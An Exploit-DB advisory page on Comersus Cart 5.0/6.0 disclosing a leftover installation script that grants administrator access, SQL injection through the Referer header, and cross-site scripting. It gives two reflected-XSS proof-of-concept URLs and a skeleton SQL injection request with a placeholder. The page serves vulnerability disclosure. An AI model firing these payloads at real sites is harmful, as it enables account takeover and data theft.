Comersus Cart 5.0/6.0 - Multiple Vulnerabilities

EDB-ID:

25060

CVE:

N/A

EDB Verified:

Author:

raf somers

Type:

webapps

Exploit:   /  

Platform:

ASP

Date:

2005-01-25

Vulnerable App: 
source: https://www.securityfocus.com/bid/12362/info

Comersus Cart is reportedly affected by multiple vulnerabilities. There is a possiblity of gaining administrator access due to a failure of the application to remove an installation script after install. There is the possiblity of SQL injection by passing a malicious HTTP referer header. There are also some possible cross-site scripting issues.

The vendor has addressed these issues in Comersus Cart version 6.0.2; earlier version are reportedly vulnerable. 

http://www.example.com/comersus/backofficelite/comersus_supportError.asp?error=<script>alert('hi%20mum');</script>
http://www.example.com/comersus/backofficelite/comersus_backofficelite_supportError.asp?error=<script>alert('hi%20mum');</script>

The following proof of concept is available for the SQL injection issue:
GET /comersus/store/default.asp HTTP/1.1
Referer: <SQLCODE HERE>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services